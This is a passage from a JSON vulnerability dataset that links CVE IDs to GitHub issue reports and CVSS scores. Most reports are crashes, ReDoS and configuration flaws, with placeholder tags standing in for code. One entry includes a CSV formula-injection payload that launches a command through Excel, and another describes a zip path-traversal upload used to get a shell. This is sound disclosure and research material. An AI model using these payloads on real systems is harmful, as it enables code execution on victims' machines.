  90319. "description": "Block NUMBERTAG more gadget types (placeholder). (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): MENTIONTAG Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  90320. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90321. "severity": "HIGH",
  90322. "baseScore": 8.1,
  90323. "impactScore": 5.9,
  90324. "exploitabilityScore": 2.2
  90325. },
  90326. {
  90327. "CVE_ID": "CVE-2020-36255",
  90328. "Issue_Url_old": "https://github.com/scottbrady91/IdentityModel/issues/4",
  90329. "Issue_Url_new": "https://github.com/scottbrady91/identitymodel/issues/4",
  90330. "Repo_new": "scottbrady91/IdentityModel",
  90331. "Issue_Created_At": "2020-08-22T12:40:16Z",
  90332. "description": "Unauthenticated ciphertext attackers can modify tokens. In extension of NUMBERTAG the current code in Branca allows attackers to modify any token's payload without invalidating the Poly NUMBERTAG authentication tag. The implementation fails to authenticate the ciphertext in APITAG at: CODETAG APITAG does not authenticate ciphertext . It writes the tag of the header into ciphertext . This is then later copied again to APITAG . The same issue is in APITAG . APITAG CODETAG Running it returns Tesu instead of Test .",
  90333. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  90334. "severity": "HIGH",
  90335. "baseScore": 7.5,
  90336. "impactScore": 3.6,
  90337. "exploitabilityScore": 3.9
  90338. },
  90339. {
  90340. "CVE_ID": "CVE-2020-36255",
  90341. "Issue_Url_old": "https://github.com/scottbrady91/IdentityModel/issues/3",
  90342. "Issue_Url_new": "https://github.com/scottbrady91/identitymodel/issues/3",
  90343. "Repo_new": "scottbrady91/IdentityModel",
  90344. "Issue_Created_At": "2020-08-22T12:39:05Z",
  90345. "description": "Poly NUMBERTAG key misuse attackers can forge authenticated tokens. In extension of NUMBERTAG the current code in Branca allows attackers to forge authenticated tokens, if a user uses any given key more than once ( see APITAG URLTAG . The issue lies in the use of the same key for both encryption and authentication of the token. CODETAG and APITAG This will automatically be fixed, if the Branca implementation adheres to the specification.",
  90346. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  90347. "severity": "HIGH",
  90348. "baseScore": 7.5,
  90349. "impactScore": 3.6,
  90350. "exploitabilityScore": 3.9
  90351. },
  90352. {
  90353. "CVE_ID": "CVE-2020-36320",
  90354. "Issue_Url_old": "https://github.com/vaadin/framework/issues/7757",
  90355. "Issue_Url_new": "https://github.com/vaadin/framework/issues/7757",
  90356. "Repo_new": "vaadin/framework",
  90357. "Issue_Created_At": "2016-07-19T08:14:53Z",
  90358. "description": "APITAG catastrophic exponential time regular expression. Originally by _jtomaszk_ ___ Class APITAG is using unsafe validation regex APITAG example of potential malicious input that validation never ends: APITAG related info [ URLTAG ___ Imported from FILETAG issue NUMBERTAG",
  90359. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90360. "severity": "HIGH",
  90361. "baseScore": 7.5,
  90362. "impactScore": 3.6,
  90363. "exploitabilityScore": 3.9
  90364. },
  90365. {
  90366. "CVE_ID": "CVE-2020-36503",
  90367. "Issue_Url_old": "https://github.com/Connections-Business-Directory/Connections/issues/474",
  90368. "Issue_Url_new": "https://github.com/connections-business-directory/connections/issues/474",
  90369. "Repo_new": "connections-business-directory/connections",
  90370. "Issue_Created_At": "2020-05-29T20:57:44Z",
  90371. "description": "Connections NUMBERTAG APITAG Export All feature Affected Version NUMBERTAG APITAG Wordpress NUMBERTAG Step to reproduce NUMBERTAG Login to your website NUMBERTAG isit URLTAG NUMBERTAG In the input filed add payload APITAG NUMBERTAG isit Connections Tools URLTAG and then click on Export All NUMBERTAG It will download a file APITAG open it with Microsoft Excel NUMBERTAG It will open CMD Exported CSV File APITAG APITAG APITAG APITAG APITAG Prefix APITAG Name APITAG Name APITAG Name APITAG Suffix APITAG APITAG APITAG APITAG First APITAG Last APITAG Address NUMBERTAG Line One APITAG Address NUMBERTAG Line Two APITAG Address NUMBERTAG Line Three APITAG Address NUMBERTAG Line Four APITAG Address NUMBERTAG District APITAG Address NUMBERTAG County APITAG Address NUMBERTAG City APITAG Address NUMBERTAG State APITAG Address NUMBERTAG Zipcode APITAG Address NUMBERTAG Country APITAG Address NUMBERTAG APITAG Address NUMBERTAG APITAG Address NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG Visibility|Im Uid|Im APITAG APITAG APITAG APITAG APITAG APITAG APITAG URL NUMBERTAG individual|public APITAG | APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| | | APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| APITAG cmd NUMBERTAG C calc'!A0| | |public | | | | | | | | | | | | | | | | | | All fields are not checked because APITAG doesn't filter any of the fields. URLTAG Reference > OWASP CSV Injection URLTAG Hopefully, it will fix soon, Let me know if you have any questions. Thanks, APITAG",
  90372. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  90373. "severity": "HIGH",
  90374. "baseScore": 8.0,
  90375. "impactScore": 5.9,
  90376. "exploitabilityScore": 2.1
  90377. },
  90378. {
  90379. "CVE_ID": "CVE-2020-5261",
  90380. "Issue_Url_old": "https://github.com/Sustainsys/Saml2/issues/711",
  90381. "Issue_Url_new": "https://github.com/sustainsys/saml2/issues/711",
  90382. "Repo_new": "sustainsys/saml2",
  90383. "Issue_Created_At": "2017-05-09T17:07:47Z",
  90384. "description": "Reserved Issue . This is a dummy issue, just to reserve an issue number for a future time when a security issue is found or reported privately.",
  90385. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
  90386. "severity": "MEDIUM",
  90387. "baseScore": 6.8,
  90388. "impactScore": 5.2,
  90389. "exploitabilityScore": 1.6
  90390. },
  90391. {
  90392. "CVE_ID": "CVE-2020-5268",
  90393. "Issue_Url_old": "https://github.com/Sustainsys/Saml2/issues/712",
  90394. "Issue_Url_new": "https://github.com/sustainsys/saml2/issues/712",
  90395. "Repo_new": "sustainsys/saml2",
  90396. "Issue_Created_At": "2017-05-09T17:08:02Z",
  90397. "description": "Reserved Issue . This is a dummy issue, just to reserve an issue number for a future time when a security issue is found or reported privately.",
  90398. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
  90399. "severity": "HIGH",
  90400. "baseScore": 7.3,
  90401. "impactScore": 5.2,
  90402. "exploitabilityScore": 2.1
  90403. },
  90404. {
  90405. "CVE_ID": "CVE-2021-20199",
  90406. "Issue_Url_old": "https://github.com/containers/podman/issues/5138",
  90407. "Issue_Url_new": "https://github.com/containers/podman/issues/5138",
  90408. "Repo_new": "containers/podman",
  90409. "Issue_Created_At": "2020-02-09T22:06:10Z",
  90410. "description": "Source IP always APITAG in rootless Podman NUMBERTAG kind bug Description For a rootless container the source IP of incoming packets on a publish port is always APITAG . Even if the request is made from an external host. Steps to reproduce the issue NUMBERTAG Start a NGINX container: APITAG NUMBERTAG Make a request from another node. APITAG NUMBERTAG Look at the source ip of the request in NGINX stdout log: APITAG Describe the results you received: The logged source address is always APITAG Describe the results you expected: The logged source ip address to match the ip of the host the request was coming from. Additional information you deem important (e.g. issue happens only occasionally): In Podman NUMBERTAG this worked as expected. And it's probably related to: > Rootless Podman now uses Rootlesskit for port forwarding, which should greatly improve performance and capabilities Output of podman version : APITAG Output of APITAG : ERRORTAG Package info (e.g. output of APITAG or apt list podman ): APITAG Additional environment details (AWS, APITAG physical, etc.): Silverblue NUMBERTAG APITAG Edition)",
  90411. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  90412. "severity": "MEDIUM",
  90413. "baseScore": 5.9,
  90414. "impactScore": 3.6,
  90415. "exploitabilityScore": 2.2
  90416. },
  90417. {
  90418. "CVE_ID": "CVE-2021-22564",
  90419. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/708",
  90420. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/708",
  90421. "Repo_new": "libjxl/libjxl",
  90422. "Issue_Created_At": "2021-10-08T08:45:08Z",
  90423. "description": "Crash during multiple concurrent/parallel decoding. Hello, This crash occurs when a Qt application decode more JXL files at the same time via my qt jpegxl image plugin URLTAG During the crash I see following message: APITAG ERRORTAG Here is a simple console application I am able to reproduce crash easily: FILETAG How to compile and run: APITAG The application decodes bucuresti2.jxl file in two threads NUMBERTAG main thread NUMBERTAG worker thread). Each thread have different instance of the plug in and each plug in create own APITAG It may not crash during first iteration, but sooner or later it crashes. The output may run like this: CODETAG Sometime it crashes immediately: CODETAG When just one thread with plug in is running at a time, there is no crash.",
  90424. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  90425. "severity": "MEDIUM",
  90426. "baseScore": 5.5,
  90427. "impactScore": 3.6,
  90428. "exploitabilityScore": 1.8
  90429. },
  90430. {
  90431. "CVE_ID": "CVE-2021-23424",
  90432. "Issue_Url_old": "https://github.com/Tjatse/ansi-html/issues/19",
  90433. "Issue_Url_new": "https://github.com/tjatse/ansi-html/issues/19",
  90434. "Repo_new": "tjatse/ansi-html",
  90435. "Issue_Created_At": "2021-05-07T15:06:26Z",
  90436. "description": "Exponential APITAG Posting here as unable to contact maintainer. Doyensec Vulnerability Advisory Regular Expression Denial of Service APITAG in ansi html Affected Product: ansi html NUMBERTAG endor: URLTAG Severity: Low Vulnerability Class: Denial of Service Status: Open Author(s): Ben Caller APITAG SUMMARY The npm package ansi html uses a regular expression which is vulnerable to Regular Expression Denial of Service APITAG If an attacker provides a malicious string, ansi html will get stuck processing the input for an extremely long time. TECHNICAL DESCRIPTION The vulnerable regular expression is NUMBERTAG d+) m URLTAG Due to the APITAG part, this regular expression has catastrophic backtracking when given a long string of digits. The behaviour occurs as long as the digits are not followed immediately by an 'm'. The complexity is exponential: increasing the length of the malicious string by one makes processing take about twice as long. REPRODUCTION STEPS In nodejs, run: APITAG Notice that node hangs at NUMBERTAG CPU. Increasing the number of spaces increases the processing time. On my laptop that would take three minutes to complete, whereas APITAG would take just over one year to complete. REMEDIATION Remove the asterisk from the regular expression on line NUMBERTAG Doyensec APITAG is an independent security research and development company focused on vulnerability discovery and remediation. We work at the intersection of software development and offensive engineering to help companies craft secure code. Copyright NUMBERTAG by Doyensec LLC. All rights reserved. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given. The information in the advisory is believed to be accurate at the time of publishing based on currently available information, and it is provided as is, as a free service to the community by Doyensec LLC. There are no warranties with regard to this information, and Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.",
  90437. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90438. "severity": "HIGH",
  90439. "baseScore": 7.5,
  90440. "impactScore": 3.6,
  90441. "exploitabilityScore": 3.9
  90442. },
  90443. {
  90444. "CVE_ID": "CVE-2021-23463",
  90445. "Issue_Url_old": "https://github.com/h2database/h2database/issues/3195",
  90446. "Issue_Url_new": "https://github.com/h2database/h2database/issues/3195",
  90447. "Repo_new": "h2database/h2database",
  90448. "Issue_Created_At": "2021-10-22T07:07:50Z",
  90449. "description": "Report a H2 Database Engine SQLXML XXE vulnerability. Hello, I am threedr3am of APITAG Security Lab URLTAG ( EMAILTAG lub). We found a security vulnerability(SCSL NUMBERTAG in the H2 Database Engine jar URLTAG when using this component to connect to the h2 database , The returned data content field is parsed through SQLXML, which will cause the client XXE ( FILETAG Oracle mysql jdbc also recently fixed a similar security vulnerability, please refer to: URLTAG This is their fix commit: URLTAG vulnerability detail: When analyzing the data returned by the database, the APITAG class provides the APITAG method, which parses the string data into an object of the APITAG class. FILETAG When the object executes the APITAG APITAG method, if the input parameter is APITAG it will result in unprotected parsing of XML, resulting in XXE. FILETAG vulnerability reproduction NUMBERTAG The table exists in the database ERRORTAG NUMBERTAG There is data in the tb_test table CODETAG NUMBERTAG Query the database to return the message field and parse it through SQLXML CODETAG NUMBERTAG result FILETAG",
  90450. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  90451. "severity": "CRITICAL",
  90452. "baseScore": 9.1,
  90453. "impactScore": 5.2,
  90454. "exploitabilityScore": 3.9
  90455. },
  90456. {
  90457. "CVE_ID": "CVE-2021-25742",
  90458. "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/7837",
  90459. "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/7837",
  90460. "Repo_new": "kubernetes/ingress-nginx",
  90461. "Issue_Created_At": "2021-10-21T16:08:21Z",
  90462. "description": "CVETAG : Ingress nginx custom snippets allows retrieval of ingress nginx serviceaccount token and secrets across all namespaces. Issue Details A security issue was discovered in ingress nginx where a user that can create or update ingress objects can use the custom snippets feature to obtain all secrets in the cluster. This issue has been rated High ( PATHTAG URLTAG , and assigned CVETAG . Affected Components and Configurations This bug affects ingress nginx. Multitenant environments where non admin users have permissions to create Ingress objects are most affected by this issue. Affected Versions with no mitigation NUMBERTAG APITAG NUMBERTAG or NUMBERTAG Set allow snippet annotations URLTAG to false in your ingress nginx APITAG based on how you deploy ingress nginx: Static Deploy Files Edit the APITAG for ingress nginx after deployment: APITAG Add directive: APITAG CODETAG APITAG to false APITAG URLTAG URLTAG Detection If you find evidence that this vulnerability has been exploited, please contact security APITAG Additional Details See ingress nginx Issue NUMBERTAG for more details. Acknowledgements This vulnerability was reported by Mitch Hulscher. Thank You, CJ Cullen on behalf of the Kubernetes Security Response Committee",
  90463. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
  90464. "severity": "HIGH",
  90465. "baseScore": 7.1,
  90466. "impactScore": 4.2,
  90467. "exploitabilityScore": 2.8
  90468. },
  90469. {
  90470. "CVE_ID": "CVE-2021-27845",
  90471. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/194",
  90472. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/194",
  90473. "Repo_new": "jasper-software/jasper",
  90474. "Issue_Created_At": "2019-02-18T06:33:54Z",
  90475. "description": "bugs found by our bug scanner. Hi all, Our bug scanner has reported some bugs. Bug triggering files are attached. Bug NUMBERTAG div/mod zero NUMBERTAG in function APITAG , FILETAG ERRORTAG Divisor: rawsize Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , FILETAG CODETAG Divisor: cmpt >hstep, cmpt >vstep Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , FILETAG CODETAG CODETAG CODETAG Divisor: cmpt >hstep, cmpt >vstep Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , FILETAG APITAG Divisor: scale Result: Could be NUMBERTAG Please Check.",
  90476. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90477. "severity": "MEDIUM",
  90478. "baseScore": 5.5,
  90479. "impactScore": 3.6,
  90480. "exploitabilityScore": 1.8
  90481. },
  90482. {
  90483. "CVE_ID": "CVE-2021-32265",
  90484. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/545",
  90485. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/545",
  90486. "Repo_new": "axiomatic-systems/bento4",
  90487. "Issue_Created_At": "2020-08-22T01:47:18Z",
  90488. "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG mp NUMBERTAG aac (latest master NUMBERTAG b NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DCMAKE_MODULE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG show layout show samples show sample data APITAG APITAG output ERRORTAG POC FILETAG",
  90489. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90490. "severity": "HIGH",
  90491. "baseScore": 8.8,
  90492. "impactScore": 5.9,
  90493. "exploitabilityScore": 2.8
  90494. },
  90495. {
  90496. "CVE_ID": "CVE-2021-34128",
  90497. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/8",
  90498. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/8",
  90499. "Repo_new": "bettershop/laiketui",
  90500. "Issue_Created_At": "2021-05-28T16:10:44Z",
  90501. "description": "Compressed file upload getshell. The cause of the vulnerability: When decompressing, the compressed files were not filtered and judged, which resulted in the possibility of uploading cross directory zip files to getshell. FILETAG Vulnerability Recurrence:: Log in to the background and PATHTAG To upload a compressed file, put the malicious file that can be traversed into a zip, upload and decompress it. FILETAG FILETAG Then access the path of the malicious file: FILETAG poc\uff1a ERRORTAG Upload was successful and executed successfully!",
  90502. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  90503. "severity": "HIGH",
  90504. "baseScore": 8.8,
  90505. "impactScore": 5.9,
  90506. "exploitabilityScore": 2.8
  90507. },
  90508. {
  90509. "CVE_ID": "CVE-2021-34557",
  90510. "Issue_Url_old": "https://github.com/QubesOS/qubes-issues/issues/6595",
  90511. "Issue_Url_new": "https://github.com/qubesos/qubes-issues/issues/6595",
  90512. "Repo_new": "qubesos/qubes-issues",
  90513. "Issue_Created_At": "2021-05-11T00:39:44Z",
  90514. "description": "Xscreensaver dies unexpectedly, cannot lock screen . APITAG Qubes OS version APITAG NUMBERTAG Affected component(s) or functionality APITAG Screensaver, locking with Ctrl Alt L Brief summary APITAG Nothing happens when trying to lock the screen. No logs. Screensaver IS set to autostart already. And it works for some time. But after some time, (not sure about the exact cause), inactivity timer does not lock the screen, nor the screen lock shortcut works. When I open the Xfce Screensaver panel, it complains about the screensaver daemon being not running. Even after starting the daemon, same thing happens after some time. As there is no log at all, I cannot trace the cause. How Reproducible APITAG This started a few days ago, probably after applying a UEFI firmware update. The bug is always present since then, I guess. To Reproduce Steps to reproduce the behavior NUMBERTAG boot the system NUMBERTAG log in. do some work NUMBERTAG the computer won't lock when you expect it to lock its screen Expected behavior APITAG The lock should work. Actual behavior APITAG Lock is disabled Screenshots APITAG Additional context APITAG It might be considered a security issue as well, I did not notice that the screen was not locked but had the impression that it was. Solutions you've tried APITAG starting the xscreensaver using the respective xfce settings panel Relevant documentation URLTAG you've consulted APITAG Found some basic info that suggests to restart the screensaver, to put it into autostart (which already appears in session and startup panel as a ticked item) Related, non duplicate CVETAG issues APITAG (could not find any)",
  90515. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90516. "severity": "MEDIUM",
  90517. "baseScore": 4.6,
  90518. "impactScore": 3.6,
  90519. "exploitabilityScore": 0.9
  90520. },
  90521. {
  90522. "CVE_ID": "CVE-2021-36371",
  90523. "Issue_Url_old": "https://github.com/emissary-ingress/emissary/issues/3340",
  90524. "Issue_Url_new": "https://github.com/emissary-ingress/emissary/issues/3340",
  90525. "Repo_new": "emissary-ingress/emissary",
  90526. "Issue_Created_At": "2021-04-13T21:29:23Z",
  90527. "description": "Bypass mTLS by mixing SNI and Host headers. Describe the bug If Ambassador is deployed with multiple hosts/tlscontexts with some using mTLS ( APITAG ) and some not, it is possible to bypass the mTLS requirements for the backends that have it configured by sending an SNI for a APITAG that does not. I believe this stems from the fact that Ambassador matches APITAG based on SNI, but Mappings based on Host header. If APITAG does not require mTLS but APITAG does, it looks like its possible to talk directly to APITAG without a valid client certificate by doing something like: APITAG In some configurations it is also possible to do the same by just talking directly to the Ambassador APITAG IP address (not sending SNI at all). This works if the \"default\" APITAG does not require mTLS (I'm not exactly clear what APITAG Ambassador will fall back on if no SNI is given) To Reproduce I've put together a working minimal example with NUMBERTAG services and the YAML configurations: URLTAG ERRORTAG Expected behavior Ambassador should not apply a Host mapping if the SNI does not match. If this is expected behavior and you can't securely mix mTLS and non mTLS upstreams this should definitely be called out in the docs for those who need to rely on mTLS authentication. Versions (please complete the following information): Ambassador NUMBERTAG Kubernetes environment: EKS and APITAG Version NUMBERTAG and NUMBERTAG Additional context It is possible my configuration is bad/wrong, so if I have missed something in the docs please let me know",
  90528. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
  90529. "severity": "LOW",
  90530. "baseScore": 3.7,
  90531. "impactScore": 1.4,
  90532. "exploitabilityScore": 2.2
  90533. },
  90534. {
  90535. "CVE_ID": "CVE-2021-38244",
  90536. "Issue_Url_old": "https://github.com/cBioPortal/cbioportal/issues/8680",
  90537. "Issue_Url_new": "https://github.com/cbioportal/cbioportal/issues/8680",
  90538. "Repo_new": "cbioportal/cbioportal",
  90539. "Issue_Created_At": "2021-06-10T19:32:01Z",
  90540. "description": "[SECURITY] Denial of service because of unsafe regex processing. I have tried to contact you by EMAILTAG skcc.org and asked for any other email in URLTAG Nobody replied. The APITAG is vulnerable to regex injection that may lead to Denial of Service. User controlled heatmap and alteration are used to build and run a regex expression: URLTAG The value end up in APITAG URLTAG Since the attacker controls the string and the regex pattern he may cause a APITAG by regex catastrophic backtracking on the server side.",
  90541. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90542. "severity": "HIGH",
  90543. "baseScore": 7.5,
  90544. "impactScore": 3.6,
  90545. "exploitabilityScore": 3.9
  90546. },
  90547. {
  90548. "CVE_ID": "CVE-2021-40564",
  90549. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1898",
  90550. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1898",
  90551. "Repo_new": "gpac/gpac",
  90552. "Issue_Created_At": "2021-08-26T11:34:51Z",
  90553. "description": "Segmentation fault caused by null pointer dereference using mp4box in avc_parse_slice, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG bcd NUMBERTAG d in avc_parse_slice (svc_idr_flag=GF_FALSE, si NUMBERTAG fffffff NUMBERTAG avc NUMBERTAG ae NUMBERTAG bs NUMBERTAG df NUMBERTAG at PATHTAG NUMBERTAG gf_avc_parse_nalu (bs NUMBERTAG df NUMBERTAG avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG f, data NUMBERTAG e5b NUMBERTAG ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer. APITAG",
  90554. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90555. "severity": "MEDIUM",
  90556. "baseScore": 5.5,
  90557. "impactScore": 3.6,
  90558. "exploitabilityScore": 1.8
  90559. },
  90560. {
  90561. "CVE_ID": "CVE-2021-40568",
  90562. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1900",
  90563. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1900",
  90564. "Repo_new": "gpac/gpac",
  90565. "Issue_Created_At": "2021-08-27T09:14:32Z",
  90566. "description": "Segmentation fault caused by buffer overflow using mp4box in svc_parse_slice, APITAG FILETAG (unzip first) Program output: ~~~~ APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! 
[AVC|H NUMBERTAG Warning: Error parsing NAL unit Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG bccc NUMBERTAG in svc_parse_slice (si NUMBERTAG fffffff NUMBERTAG avc NUMBERTAG ae NUMBERTAG bs NUMBERTAG de0) at PATHTAG NUMBERTAG gf_avc_parse_nalu (bs NUMBERTAG de0, avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG c, data NUMBERTAG b NUMBERTAG a1 \"trak\", ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG e NUMBERTAG at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  90567. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90568. "severity": "HIGH",
  90569. "baseScore": 7.8,
  90570. "impactScore": 5.9,
  90571. "exploitabilityScore": 1.8
  90572. },
  90573. {
  90574. "CVE_ID": "CVE-2021-40570",
  90575. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1899",
  90576. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1899",
  90577. "Repo_new": "gpac/gpac",
  90578. "Issue_Created_At": "2021-08-27T09:02:37Z",
  90579. "description": "Segmentation fault caused by buffer overflow using mp4box in avc_compute_poc, APITAG FILETAG (unzip first) Program output: ~~~~ APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [avc h NUMBERTAG offset_for_ref_frame overflow from poc_cycle_length [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG b NUMBERTAG f NUMBERTAG in avc_compute_poc (si=si APITAG at PATHTAG NUMBERTAG bce NUMBERTAG in gf_avc_parse_nalu (bs=<optimized out>, avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG f, data NUMBERTAG dfba PATHTAG 